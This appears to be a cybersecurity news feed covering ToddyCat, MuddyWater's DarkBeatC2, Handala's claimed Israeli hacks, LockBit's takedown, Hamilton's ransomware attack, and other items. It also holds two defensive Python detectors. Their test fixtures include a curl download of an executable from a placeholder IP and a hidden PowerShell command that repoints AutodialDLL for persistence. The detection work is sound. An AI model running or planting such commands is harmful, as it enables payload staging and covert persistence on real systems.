
ToddyCat APT Is Siphoning Data on 'Industrial Scale'

ToddyCat, an advanced persistent threat (APT) gang that targets the government and defence industries, has been seen collecting stolen data "on an industrial scale" from victim organisations in Asia-Pacific. 

Kaspersky researchers first disclosed details of the elusive gang's activity in 2022, although it has been operating since December 2020. ToddyCat is believed to be a Chinese-speaking gang, though its origins and affiliations are unknown.

Initially, the threat group targeted only certain organisations in Taiwan and Vietnam. When the ProxyLogon vulnerabilities in Microsoft Exchange Server were discovered in early 2021, it broadened the scope of its operations, now targeting multiple European and Asian organisations. 

ToddyCat upgraded its tools and strategies in 2023, and launched a long-running attack against government entities and telecom providers in multiple Asian countries. 

In Kaspersky's most recent review of the group, published last week, researchers Andrey Gunkin, Alexander Fedotov, and Natalya Shornikova explained the techniques the gang had lately been seen employing to exfiltrate massive volumes of data. 

“During the observation period, we noted that this group stole data on an industrial scale,” researchers explained. “To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack.”

One of the group's distinguishing traits was its predilection for creating many tunnels with various tools into the infrastructure of the organisations it targeted. This allowed the gang to keep using the compromised systems even after one of the tunnels was identified and removed, according to the researchers.

ToddyCat used reverse SSH tunnels to get access to remote network services. The gang also employed SoftEther VPN, an open-source tool that allows for the establishment of VPN connections using a variety of popular protocols.

“In virtually every case we observed, the attackers renamed vpnserver_x64.exe to hide its purpose in the infected system,” the researchers added. “To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources, and downloaded files from remote resources using the curl utility.” 

To protect against the gang, the researchers advised defenders to add the resources and IP addresses of cloud providers that allow traffic tunnelling to their firewall deny lists. The researchers also recommended limiting the tools administrators can use to remotely access hosts.
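One way a defender can act on the renamed-binary and curl-download observations above, as an added example that is not Kaspersky's or the page's code: it assumes Sysmon-style process-creation events carrying Image, OriginalFileName, CommandLine and User fields, and that SoftEther's server binary reports vpnserver_x64.exe as its OriginalFileName; the events are constructed.

```python
"""Flag renamed tunnelling binaries in Sysmon-style process-creation events.

Added example, not Kaspersky's or ToddyCat's code. Sysmon Event ID 1 records
both the on-disk path (Image) and the OriginalFileName from the PE version
resource, so a renamed copy of vpnserver_x64.exe still reports its original
name (assumption: SoftEther's binary carries that field). Events are constructed.
"""
from __future__ import annotations
import ntpath
import re

# Original filenames of tunnelling tools named in the ToddyCat report.
TUNNELLING_ORIGINALS = {"vpnserver_x64.exe"}  # SoftEther VPN Server

# `curl -o <path>`: the local file a download was written to.
_CURL_OUTPUT = re.compile(r'(?:^|\s)-o\s+"?([^\s"]+)"?')
_URL = re.compile(r"https?://", re.IGNORECASE)

# Constructed Sysmon Event ID 1 records (subset of fields), in time order.
# 203.0.113.7 is a documentation address, not a real indicator.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\SoftEther VPN Server\vpnserver_x64.exe",
     "OriginalFileName": "vpnserver_x64.exe", "User": r"CORP\itadmin",
     "CommandLine": r'"C:\Program Files\SoftEther VPN Server\vpnserver_x64.exe"'},
    {"Image": r"C:\Windows\System32\curl.exe",
     "OriginalFileName": "curl.exe", "User": r"CORP\svc_backup",
     "CommandLine": r"curl.exe -o C:\Windows\Temp\wspsvc.exe http://203.0.113.7/wspsvc.exe"},
    {"Image": r"C:\Windows\Temp\wspsvc.exe",
     "OriginalFileName": "vpnserver_x64.exe", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": r"C:\Windows\Temp\wspsvc.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "User": r"CORP\alice",
     "CommandLine": "notepad.exe"},
]


def download_target(command_line: str) -> str | None:
    """Return the local path written by a `curl -o` invocation, if any."""
    m = _CURL_OUTPUT.search(command_line)
    return m.group(1) if m else None


def classify(event: dict) -> str | None:
    """Label a single event, or None when it matches nothing of interest."""
    image_name = ntpath.basename(event["Image"]).lower()
    original = event.get("OriginalFileName", "").lower()
    command_line = event.get("CommandLine", "")
    if original in TUNNELLING_ORIGINALS:
        # Same name on disk: a tunnelling tool worth noting. Different name: it was renamed.
        return "tunnelling-tool" if image_name == original else "renamed-tunnelling-tool"
    if original == "curl.exe" and download_target(command_line) and _URL.search(command_line):
        return "curl-download"
    return None


def scan(events: list[dict]) -> list[dict]:
    """Classify events and tie a renamed tool back to the curl download that staged it."""
    findings, staged = [], {}  # staged: lower-cased local path -> user who downloaded it
    for event in events:
        verdict = classify(event)
        if verdict is None:
            continue
        if verdict == "curl-download":
            staged[download_target(event["CommandLine"]).lower()] = event["User"]
        elif verdict == "renamed-tunnelling-tool" and event["Image"].lower() in staged:
            verdict = "renamed-tunnelling-tool-staged-by-curl"
        findings.append({"verdict": verdict, "image": event["Image"], "user": event["User"]})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding['verdict']:<40} {finding['user']:<22} {finding['image']}")
```

The legitimate SoftEther install is reported as well so an analyst can decide whether the tool is sanctioned at all, which is the point of the report's advice to limit remote-access tooling.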

New AI Speed Cameras Record Drivers on Their Phones

New AI cameras have been deployed in vans to record drivers using their phones while driving or driving without a seatbelt. 

During a 12-hour evaluation in March, South Gloucestershire Council discovered 150 individuals not wearing seatbelts and seven drivers preoccupied by their cell phones. 

Pamela Williams, the council's road safety education manager, stated, "We believe that using technology like this will make people seriously consider their driving behaviour." 

According to figures, 425 people sustained injuries on South Gloucestershire roads in 2023, with 69 critically injured or killed. Throughout the survey, vans were equipped with mounted artificial intelligence (AI) technology. The devices monitored passing vehicles and determined whether drivers were infringing traffic laws. 

If a likely violation was spotted, the images were submitted to at least two experienced highways operators for inspection. No fixed penalty notices were issued, and photographs found not to show a violation were automatically deleted. The council stated that it was using the technology only for surveys, not enforcement.

Dave Adams, a road safety officer, helped conduct the area's first survey. He went on to say: "This is a survey so we can understand driver behaviour that will actually fit in with other bits of our road safety strategy to help make our roads safer.”

Ms Williams noted that "distracted drivers" and those who do not wear seatbelts are contributing factors in road fatalities. "Working with our partners we want to reduce such dangerous driving and reduce the risks posed to both the drivers and other people."

Fatalities remain high 

Dr Jamie Uff, Aecom's lead research specialist in charge of the technology's deployment, stated: "Despite attempts by road safety agencies to modify behaviour via education, the number of individuals killed or badly wounded as a result of these risky driving practices remains high.

"The use of technology like this makes detection of these behaviours straightforward and is providing valuable insight to the police and policy makers."

Iranian Hacker Group Blasts Out Threatening Texts to Israelis

Handala, an Iranian cyber outfit, has claimed to have taken down the Iron Dome missile defence system and breached Israel's radars. 

A major cyber attack is believed to have unfolded when the Handala hacking group, which is renowned for targeting Israeli interests, broke through Israel's radar defences and bombarded Israeli citizens with text messages. 

The criminal group claimed it had broken into the radar systems and delivered 500,000 text messages to Israeli civilians with an urgent reminder that Israel has a short window of time to fix the breached systems. 

Handala's hack on Israel has been extensive, encompassing cyberattacks on radar and Iron Dome missile defence systems. Rada Electronics, a defence technology firm associated with Israel's objectives, reportedly fell prey to Handala's intrusion, with leaked dashboard images purporting to validate the hack. 

The Cyber Express, a local media outlet, contacted Rada Electronics to verify the claims of this intrusion. However, as of this writing, no official comment or answer has been issued. Furthermore, a service provider in charge of Israeli consumer alerts and Israel's Cyber Security College allegedly suffered significant data breaches, resulting in terabytes of exposed information. 

History of Handala hacker group 

As a pro-Palestinian outfit, the hackers behind it took their name from Handala, a key national emblem of the Palestinian people. Naji al-Ali, a political cartoonist, created the figure Handala in 1969, and it took on its current shape in 1973.

It represents the spirit of Palestinian identity and struggle, which al-Ali frequently depicted in his cartoons. Handala, named after the Citrullus colocynthis plant found in Palestine, represents resilience: the plant has strong roots and bitter fruit that regrows when cut.

Since al-Ali's assassination in 1987, Handala has been a significant symbol of Palestinian identity, displayed frequently on walls and buildings throughout the West Bank, Gaza, and Palestinian refugee camps. It has also been popular as a tattoo and jewellery symbol, and it has been adopted by movements such as Boycott, Divestment, and Sanctions, as well as the Iranian Green Movement, which is now known as the Handala hacker group. 

Handala's characteristic posture, with the back turned and hands linked behind, represents a rejection of imposed solutions and sympathy with the marginalised. The character, who continues to be 10 years old, represents al-Ali's age when he left Palestine, and embodies the desire to return to his homeland.

Furthermore, the hacking group has claimed several such attacks, consistent with its self-presentation as a Palestinian supporter. Although official Israeli sources have yet to validate Handala's claims, security experts in Israel have expressed concerns about the likelihood of Iranian cyberattacks on critical national infrastructure.

Ban the Scan - Is Facial Recognition a Risk to Civil Liberties?

There are numerous voices around the world opposing the use of facial recognition technology. Many people believe facial recognition poses a severe threat to individual privacy, free speech, racial equality, and data security. Opponents have solid grounds for their position and strong reservations about employing this technology in any form, citing its very high false positive rate and its implications for civil and personal liberties, specifically individual privacy.

Critics argue that facial recognition is biased against people of color, women, and children. Surveillance cameras are more common in areas where immigrants live, which adds fuel to the fire; the explanation offered is the higher crime rate in those areas. Facial recognition technology has not matured sufficiently, and its use in such an environment worsens an already complex situation. The technology's inaccuracy will amplify the flaws in the justice system, contributing to harsher sentences and higher bail for those affected.

Forced deployment

Despite these flaws, facial recognition technology is used by police and other law enforcement agencies across the world. Surveillance is the industry in which it is most widely applied. It is also commonly used in airports for passenger screening, as well as in housing and employment decisions. In 2020, San Francisco, Boston, and a few other localities restricted the use of facial recognition.

According to an article on the Harvard blog by Alex Najibi, “police use face recognition to compare suspects’ photos to mugshots and driver’s license images; it is estimated that almost half of American adults – over 117 million people, as of 2016 – have photos within a facial recognition network used by law enforcement. This participation occurs without consent, or even awareness, and is bolstered by a lack of legislative oversight.” 

Private companies are also attempting to capitalise on biometric scanning in various ways, collecting user data for a variety of purposes. Blaming Google and Meta for collecting excessive amounts of user data is nothing new. The most recent clamour came when the Worldcoin initiative, founded by OpenAI CEO Sam Altman, proposed iris scanning as a requirement for coin ownership. These private-sector initiatives are troubling.

Compared to other biometric systems such as fingerprints, iris scanning, and voice recognition, facial recognition has the highest error rate and is the most likely to cause privacy problems and bias against marginalised people and children.

The Electronic Frontier Foundation (EFF) and the Surveillance Technology Oversight Project (S.T.O.P.) oppose the use of facial recognition in any form. S.T.O.P. is based in New York, and its work focuses on civil rights. It also conducts research and advocacy on the abuse of surveillance technology.

Regarding the Ban the Scan movement, S.T.O.P. says, "When we say scan, we mean the face scan feature of facial recognition technology. Surveillance, particularly facial recognition, is a threat to free speech, freedom of association, and other civil liberties. Ban the Scan is a campaign and coalition built around passing two packages of bills that would ban facial recognition in a variety of contexts in New York City and New York State."

Iranian Hackers Use New C2 Tool 'DarkBeatC2' in Recent Operation

MuddyWater, an Iranian threat actor, has used a novel command-and-control (C2) infrastructure known as DarkBeatC2 in its most recent attack. This tool joins a list of previously used systems, including SimpleHarm, MuddyC3, PhonyC2, and MuddyC2Go.

In a recent technical study, Deep Instinct security researcher Simon Kenin stated that, despite periodic modifications in remote administration tools or changes in C2 frameworks, MuddyWater's strategies consistently follow a pattern.

MuddyWater, also known as Boggy Serpens, Mango Sandstorm, and TA450, is linked to Iran's Ministry of Intelligence and Security (MOIS) and has been operational since at least 2017. The group orchestrates spear-phishing attacks that result in the installation of legitimate Remote Monitoring and Management (RMM) tools on compromised systems.

Prior intelligence from Microsoft connects the group to another Iranian threat cluster known as Storm-1084 (also known as DarkBit), which has been involved in devastating wiper assaults against Israeli entities.

The latest attack, which Proofpoint revealed last month, starts off with spear-phishing emails sent from compromised accounts. These emails include links or attachments hosted on services such as Egnyte, which facilitate the distribution of the Atera Agent software.

One of the URLs used is "kinneretacil.egnyte[.]com," with the subdomain "kinneretacil" referring to "kinneret.ac.il," an Israeli educational institution. 

Lord Nemesis (also known as Nemesis Kitten or TunnelVision) targeted a Rashim customer's supply chain. Lord Nemesis, who is accused of orchestrating operations against Israel, is employed by Najee Technology, a private contracting company linked to Iran's Islamic Revolutionary Guard Corps (IRGC). 

Kenin underlined the possible consequences of Rashim's breach, claiming that Lord Nemesis might have exploited the compromised email system to target Rashim's customers, giving the phishing emails a veneer of authenticity.

Although solid proof is missing, the timing and context of events indicate a possible coordination between the IRGC and MOIS to cause serious harm to Israeli entities.

Notably, the attacks leverage a collection of domains and IP addresses known as DarkBeatC2 to manage compromised endpoints. This is done using PowerShell code that creates communication with the C2 server after initial access. 

According to independent research by Palo Alto Networks Unit 42, MuddyWater used the Windows Registry's AutodialDLL entry to sideload a malicious DLL and connect to DarkBeatC2 domains.

This method establishes persistence via a scheduled task that uses PowerShell to modify the AutodialDLL registry entry so that the DLL for the C2 framework is loaded. MuddyWater's other approaches include delivering a first-stage payload via spear-phishing emails and using DLL side-loading to execute malicious libraries.

Upon successful communication, the infected machine receives PowerShell responses and downloads two further PowerShell scripts from the server. One script reads the contents of a file called "C:\ProgramData\SysInt.log" and sends them to the C2 server via an HTTP POST request, while the second script polls the server on a regular basis for new payloads. The particular nature of the subsequent payload is unknown, but Kenin emphasised that PowerShell remains critical to MuddyWater's operations.
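The AutodialDLL persistence and the PowerShell steps described above can be audited on a host from a registry export and scheduled-task definitions. The following is an added example, not code from Deep Instinct, Unit 42 or this page; it assumes the stock AutodialDLL value is %SystemRoot%\System32\rasadhlp.dll, and its registry-export text and task XML are constructed.

```python
"""Audit the Winsock AutodialDLL value and scheduled-task actions for the
persistence pattern described in the DarkBeatC2 write-up.

Added example, not Deep Instinct's, Unit 42's or MuddyWater's code. Inputs are
constructed `reg export`-style dumps and Task Scheduler XML, so it runs offline.
"""
from __future__ import annotations
import re
import xml.etree.ElementTree as ET

# Stock Windows points AutodialDLL at rasadhlp.dll (assumption stated here); a
# value aimed anywhere else, for instance under ProgramData, warrants a closer look.
AUTODIAL_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters"
DEFAULT_AUTODIAL = r"%SystemRoot%\System32\rasadhlp.dll"
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Constructed export from a clean host: REG_EXPAND_SZ is dumped as hex(2) UTF-16LE.
CLEAN_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters]
"AutodialDLL"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,\
  5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,72,00,61,00,73,00,61,00,64,00,\
  68,00,6c,00,70,00,2e,00,64,00,6c,00,6c,00,00,00
"WinSock_Registry_Version"="2.0"
"""
# Constructed export from a host where the value was repointed (written as REG_SZ).
MODIFIED_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters]
"AutodialDLL"="C:\\ProgramData\\SysInt\\autodial.dll"
"WinSock_Registry_Version"="2.0"
"""


def _task_xml(arguments: str) -> str:
    """Minimal Task Scheduler XML with one PowerShell action (constructed; real exports are UTF-16)."""
    return (f'<Task version="1.2" xmlns="{TASK_NS[1:-1]}"><Actions Context="Author"><Exec>'
            f"<Command>powershell.exe</Command><Arguments>{arguments}</Arguments></Exec></Actions></Task>")


SUSPICIOUS_TASK = _task_xml("-w hidden -c \"Set-ItemProperty 'HKLM:\\SYSTEM\\CurrentControlSet\\Services"
                            "\\WinSock2\\Parameters' AutodialDLL 'C:\\ProgramData\\SysInt\\autodial.dll'\"")
BENIGN_TASK = _task_xml("-File C:\\Scripts\\nightly-backup.ps1")

_VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
_HEX_STRING = re.compile(r"^hex\((1|2)\):(.*)$")  # REG_SZ / REG_EXPAND_SZ stored as bytes
_AUTODIAL_REFS = re.compile(r"autodialdll|winsock2\\parameters|sysint\.log", re.IGNORECASE)


def _decode_reg_data(raw: str) -> str | None:
    """Decode a quoted REG_SZ or a hex(1)/hex(2) UTF-16LE string; None for other types."""
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    m = _HEX_STRING.match(raw)
    if m:
        data = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
        return data.decode("utf-16-le").rstrip("\x00")
    return None


def parse_reg_export(text: str) -> dict[tuple[str, str], str]:
    """Map (key, value name), both lower-cased, to decoded string data."""
    values, key = {}, None
    for line in re.sub(r"\\\r?\n\s*", "", text).splitlines():  # rejoin continued hex lines
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
        elif key and (m := _VALUE_LINE.match(line)):
            data = _decode_reg_data(m.group(2))
            if data is not None:
                values[(key, m.group(1).lower())] = data
    return values


def audit_autodial(reg_text: str) -> dict:
    """Report whether AutodialDLL is at its default, modified, or absent from the export."""
    value = parse_reg_export(reg_text).get((AUTODIAL_KEY.lower(), "autodialdll"))
    if value is None:
        return {"status": "missing", "value": None}
    status = "default" if value.lower() == DEFAULT_AUTODIAL.lower() else "modified"
    return {"status": status, "value": value}


def suspicious_task_actions(task_xml: str) -> list[str]:
    """Return arguments of PowerShell Exec actions that reference AutodialDLL or SysInt.log."""
    hits = []
    for action in ET.fromstring(task_xml).iter(TASK_NS + "Exec"):
        command = (action.findtext(TASK_NS + "Command") or "").lower()
        arguments = action.findtext(TASK_NS + "Arguments") or ""
        if "powershell" in command and _AUTODIAL_REFS.search(arguments):
            hits.append(arguments)
    return hits


if __name__ == "__main__":
    print("clean    :", audit_autodial(CLEAN_REG))
    print("modified :", audit_autodial(MODIFIED_REG))
    print("task hits:", suspicious_task_actions(SUSPICIOUS_TASK))
```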

Data Brokers are Preparing to Challenge Privacy Legislation

Congress has been attempting to crack down on data brokers, and they are fighting back. In late March, the House voted unanimously to ban the sale of Americans' data to foreign rivals, and a data-collection provision is included in the bill reauthorizing Section 702 of the Foreign Intelligence Surveillance Act (FISA), the contentious law underpinning National Security Agency surveillance, which is set to expire later this month.

Negotiations over FISA's reauthorization became so heated that House Speaker Mike Johnson pulled the bill from consideration in February. The most contentious issue was an amendment proposed by Rep. Warren Davidson (R-OH) that would bar data brokers from selling customer data to law enforcement and require a warrant to access Americans' information, according to Politico's Influence newsletter in February. 

National security hawks in Congress and local law enforcement groups joined forces to oppose the amendment, with the National Sheriffs' Association alleging in a letter to Congress that it would "kneecap law enforcement". 

"On House amendments, the Sheriffs of this great country don't usually keep score. But on this one, we will keep score and know who our friends are by their votes against Congressman Davidson's amendment, which further erodes the rule of law in our country and empowers the cartels," the letter stated. 

With FISA about to expire at the end of the month, Congress will undoubtedly bring it up again. Some legislators have indicated that they are unlikely to support the bill unless privacy updates are included. "We must have these amendments," Rep. Jim Jordan (R-OH), leader of the House Judiciary Committee, told Politico in February. "There's no way we're not going to have them."

Data brokers also seem to be entering the fight. Politico's Influence newsletter revealed that early this year, when the amendment was being discussed in the House, Relx, the parent company of data analytics company LexisNexis, based in the United Kingdom, hired the lobbying firm Venable. 

Recently, criticism of other Relx subsidiaries' data collection and distribution practices has also surfaced. The New York Times revealed in March that a number of automakers were providing LexisNexis Risk Solutions with their customers' driving records, which the company then sold to insurance firms.

What are Deepfakes and How to Spot Them

Artificial intelligence (AI)-generated fraudulent videos that can easily deceive average viewers have become commonplace as modern computers have enhanced their ability to simulate reality.

For example, modern cinema relies heavily on computer-generated sets, scenery, people, and even visual effects. These digital locations and props have replaced physical ones, and the scenes are almost indistinguishable from reality. Deepfakes, one of the most recent trends in computer imagery, are created by programming AI to make one person look like another in a recorded video. 

What is a deepfake? 

Deepfakes resemble digital magic tricks. They use computers to create fraudulent videos or audio that appear and sound authentic. It's like filming a movie, but with real people doing things they've never done before. 

Deepfake technology relies on a complicated interaction of two fundamental algorithms: a generator and a discriminator. These algorithms collaborate within a framework called a generative adversarial network (GAN), which uses deep learning concepts to create and refine fake content. 

Generator algorithm: The generator's principal function is to create initial fake digital content, such as audio, photos, or videos. The generator's goal is to replicate the target person's appearance, voice, or feelings as closely as possible. 

Discriminator algorithm: The discriminator then examines the generator's content to determine if it appears genuine or fake. The feedback loop between the generator and discriminator is repeated several times, resulting in a continual cycle of improvement. 

Why do deepfakes cause concerns? 

Misinformation and disinformation: Deepfakes can be used to make convincing videos or audio recordings of people saying or doing things they did not do. This creates a significant risk of spreading misleading information, causing reputational damage and influencing public opinion.

Privacy invasion: Deepfake technology has the ability to violate innocent people's privacy by manipulating their images or voices for malicious intents, resulting in harassment, blackmail, or even exploitation. 

Crime and fraud: Criminals can employ deepfake technology to imitate others in fraudulent operations, making it challenging for authorities to detect and prosecute those responsible. 

Cybersecurity: As deepfake technology progresses, it may become more difficult to detect and prevent cyberattacks based on modified video or audio recordings. 

How to detect deepfakes 

Though recent advances in generative Artificial Intelligence (AI) have increased the quality of deepfakes, we can still identify telltale signs that differentiate a fake video from an original.

- Pay close attention to the start of the video. For example, many viewers overlooked the fact that the face at the beginning of the viral Mandanna video was still Zara Patel's; the deepfake was not applied until the person boarded the lift.

- Pay close attention to the person's facial expressions throughout the video. During speech or movement, a deepfake often shows irregular changes in expression.

- Look for lip synchronisation issues. There will be some minor audio/visual sync issues in the deepfake video. Always try to watch viral videos several times before deciding whether they are a deepfake or not. 

Beyond such checks, government agencies and tech companies should collaborate to develop cross-platform detection tools that will help stop the creation of deepfake videos.

Scaleway Introduces First RISC-V Servers on the Cloud

The world's first line of RISC-V servers has been introduced by European cloud operator Scaleway, which claims this is a "firm commitment to technological independence" in a market where companies are increasingly vying for control over semiconductor production.

The University of California, Berkeley developed the free and open instruction set architecture known as RISC-V, which has the potential to completely transform the semiconductor industry. Even though RISC-V is a relatively new design, it is already producing high performance levels, which makes it a competitive substitute for more well-known architectures like ARM and x86. 

Alibaba's T-Head TH1520 SoC, 16GB RAM, and 128GB eMMC storage are included in Scaleway's RISC-V servers. Priced at an affordable €15.99 a month (or €0.042 per hour), these Elastic Metal RV1 servers run on Debian, Ubuntu, or Alpine Linux and offer a 100 Mbit/s Ethernet network card as well as public IPv4 and IPv6 addresses. 

"We're delighted to be the first to offer RISC-V servers in the cloud, opening up new opportunities for our customers to meet growing demands for sovereignty, efficiency and sustainability. This innovation is a further step towards our vision of an independent and competitive European cloud", stated Damien Lucas, CEO at Scaleway. 

These servers are energy-efficient, using between 0.96W and 1.9W per 1.8GHz core, and dense, with a 52U rack able to accommodate up to 672 EM-RV1s. The intricate design consists of hand-soldered parts, 3D-printed blades, and a laser-cut chassis.

Scaleway claims that these servers are the outcome of months of research and development in its Paris laboratories. However, the decision to employ eMMC storage may be unfortunate. While inexpensive, eMMC storage is slower and less dependable than other types of storage, such as SSDs. This could affect the server's performance and lifetime. 

Scaleway introduced Arm servers in 2015, but eventually discontinued them in favour of AMD and Intel-based servers. With the introduction of these RISC-V servers, the company is clearly ready to try something new in the cloud server industry.

Canadian City Says Timescale for Recovering from Ransomware Attack 'Unknown'

The Canadian city of Hamilton is still recovering from a ransomware attack that disrupted nearly every facet of municipal operations.

Since February 25, when the ransomware attack was first reported, city officials have been working nonstop. Foundational services, such as waste collection, transit, and water and wastewater treatment, are functioning as of Wednesday.

However, the attack has impacted nearly every online payment system, forcing the city to rely on cash transactions and other manual processes. All fines, tickets, and tax payments must be made in person. 

The city reported phone system or website issues across numerous municipal services, including cemeteries, child care centres, and public libraries. No city council meetings will be held before March 15, and the city's libraries are not providing WiFi, public computers, printing services, or other services.

“The City of Hamilton took swift action to investigate, protect systems and minimize impact on the community. We engaged a team of experts, insurers, legal counsel, and relevant authorities and [are] working diligently to restore the City’s system in a safe and secure manner,” the city said in a statement. “While a timeline for recovery is not yet known, the City is committed to resolving the situation as quickly and effectively as possible.” 

Hamilton is located roughly 40 miles from Toronto and has a population of nearly 600,000. The city stated that it is currently investigating whether citizen data was stolen. No ransomware group has claimed responsibility for the attack yet, and local officials have not responded to calls for comment. 

City officials held a press conference on Tuesday, and City Manager Marnie Cluckie stated that it is "impossible to know how long it will take us to get up and running again.” 

Cluckie declined to comment on whether the city is in talks with the ransomware group, stating that they will "do what is best for the city." She confirmed that the city has cyber insurance. 

During the press conference, Cluckie was asked whether the recovery would follow the same timeline as that of the Toronto Library, which dealt with disruption for more than four months after a ransomware attack. Cluckie said the cyber specialists the city hired would only tell her that every attack and recovery is different.

Hamilton is the second municipality in Canada to deal with a ransomware attack over the last week. Ponoka, a small town about an hour west of Edmonton, recently dealt with a ransomware attack that caused system failures for the government.

UK Led Global Operations Disrupt LockBit's Criminal Network

One of the most notorious cybercrime organisations in the world has been hit by an unprecedented police operation involving the arrest and indictment of members of the Lockbit ransomware group by the FBI and Britain's National Crime Agency. 

The United States has charged two Russian citizens with deploying Lockbit ransomware against organisations and companies across the globe. Police in Poland and Ukraine made two arrests. 

The disruption of a criminal network, which has targeted over 2,000 victims globally, accepted over $120 million in ransom payments, and demanded hundreds of millions of dollars, was announced by the NCA, FBI, Europol, and U.S. Department of Justice at a meeting in London. 

Britain's National Crime Agency Cyber Division, in collaboration with the U.S. Department of Justice, the Federal Bureau of Investigation, and other law enforcement agencies, seized control of websites used by the LockBit gang, U.S. and British authorities said. The agencies went a step further, publishing internal data about the group on LockBit's own website.

“We have hacked the hackers," Graeme Biggar, director general of the National Crime Agency, told journalists. "We have taken control of their infrastructure, seized their source code and obtained keys that will help victims decrypt their systems.” 

The takedown, dubbed "Operation Cronos", was an international coalition of 10 countries, he added. "Together, we have arrested, indicted or sanctioned some of the perpetrators and we have gained unprecedented and comprehensive access to Lockbit's systems."

Billions in damages 

Ransomware is malicious software that encrypts data; Lockbit and its affiliates profit by coercing victims into paying a ransom to decrypt or unlock that data using a digital key. In recent months, some of the world's largest organisations have been targeted by the gang's digital extortion tools.

Its affiliates are like-minded criminal groups that Lockbit recruits to carry out attacks with those tools. Those affiliates carry out the attacks and pay Lockbit a portion of the ransom, which is typically sought in cryptocurrency, making it difficult to track. 

Operation Cronos seized 34 of LockBit's computers, detained two gang members, froze 200 cryptocurrency accounts, and shut down 14,000 "rogue accounts" used online to launch LockBit's operations, the officials said.

LockBit has caused monetary losses totalling billions, the NCA's Biggar stated, to businesses that not only had to pay ransoms but also had to shoulder the cost of getting their systems back online.

Before it was disrupted, Lockbit's website displayed an ever-growing gallery of victim organisations that was updated nearly daily. Next to their names were digital clocks that showed the number of days left to the deadline given to each organisation to provide ransom payment.

Data Collaboration Platforms Ruling the Charts in Unlocking Sophisticated AI Models

Large Language Models (LLMs) have opened up exciting new possibilities for organisations in the field of artificial intelligence (AI), including enhanced decision-making, streamlined processes, and ground-breaking innovation.

Leading companies like Zendesk, Slack, Goldman Sachs, GitHub, and Unilever have used LLMs to enhance customer service, streamline coding processes, and effectively respond to consumer queries. However, given their strength, LLMs frequently prove inadequate when faced with the particular complexities of an organisation's environment. 

Training issues with refined AI models 

Businesses have resorted to employing organisation-specific data to fine-tune LLMs in order to conquer such challenges, resulting in highly customised AI models. 

These fine-tuned models provide a customised AI experience that significantly improves organisational performance. 

However, entering the field of fine-tuning AI models presents companies with three significant challenges. First, the task requires access to large volumes of high-quality data, which is often a limited resource for many businesses. Second, LLMs are based on publicly available online content, which may result in biases and a lack of diversity and pluralism in the generated content.

Third, training fine-tuned models on consumers' personal data raises serious privacy concerns, potentially leading to regulatory violations.

Navigating the data issues in fine-tuning AI 

Fine-tuned AI models thrive on large, diversified datasets. However, numerous businesses confront difficulty in acquiring the essential data, particularly in niche or specialized domains. 

The challenge is worsened when the available data is unstructured or of low quality, making it difficult to extract useful insights. Beyond quantity, data relevance, quality, and the representation of varied perspectives are also critical factors. 

Generic AI models, like LLMs, mostly reflect the internet as a whole, ignoring the subtleties of particular communities or user groups. As a result, these models frequently generate biased, culturally insensitive, or inadequate results, ignoring specific community experiences and perspectives.

To ensure that AI responses are fair, inclusive, and culturally aware, organisations must fill these models with data that truly represents societal diversity. 

Embracing data collaboration platforms 

Business leaders that embrace data collaboration platforms can reap numerous benefits. These platforms allow access to high-quality data, safeguard against legal challenges, and present a varied, pluralistic view of AI.

Business leaders should consider taking a few crucial actions in order to fully realise the potential of refined models.

Off-the-shelf AI solutions, however powerful, may lack the context and nuances unique to a certain organisation. Customisation is critical for aligning AI models with specific requirements. 

High-quality and diversified datasets are required for accurate and impartial AI results. Data collaborations can help models perform better and have more diversity.

Consider working together even with rival companies, in addition to alliances with partners and clients. The industry as a whole can gain from cooperative efforts that result in innovations and efficiencies. 

Models need to be updated with the latest statistics because data is perishable. Find sources of up-to-date information pertinent to AI's problem-solving objectives.

Attackers Employ TeamViewer to Gain Initial Access to Networks


Organisations have long utilised TeamViewer software to provide remote aid, collaboration, and access to endpoint devices. Like other authorised remote access technologies, it is often employed by attackers to gain initial access to target systems.

The most recent example is the pair of attempted ransomware deployment incidents that Huntress researchers recently came across. 

Unsuccessful ransomware deployment

The attacks that Huntress detected targeted two separate endpoint devices belonging to Huntress customers. Both incidents involved failed attempts to install what appeared to be ransomware built with a leaked builder for LockBit 3.0 ransomware. 

Further investigation revealed that TeamViewer was the initial point of access for the attackers to both endpoints. The logs showed that the same threat actor was responsible for both occurrences, as the attacks originated from an endpoint with the same hostname.

After initially gaining access via TeamViewer, the threat actor used one of the computers for roughly seven minutes, and on the other, the attacker's session lasted for over ten minutes. 

Huntress' report does not say how the attacker gained control of the TeamViewer instances in either incident. However, Huntress's senior threat intelligence analyst, Harlan Carvey, notes that a few of the TeamViewer logins appear to come from outdated systems. 

"The logs provide no indication of logins for several months or weeks before the threat actor's access," Carvey states. "In other instances, there are several legitimate logins, consistent with prior logins — username, workstation name, etc. — shortly before the threat actor's login." 

Carvey believes that the threat actor may have been able to purchase access from an initial access broker (IAB) and that the credentials and connection information might have been stolen from other endpoints using a keyboard logger, infostealers, or other techniques. 

There have been other past instances when attackers employed TeamViewer in a similar manner. One was a campaign launched last May by a threat actor who wanted to install the XMRig crypto mining software on systems after gaining initial access through the tool. 

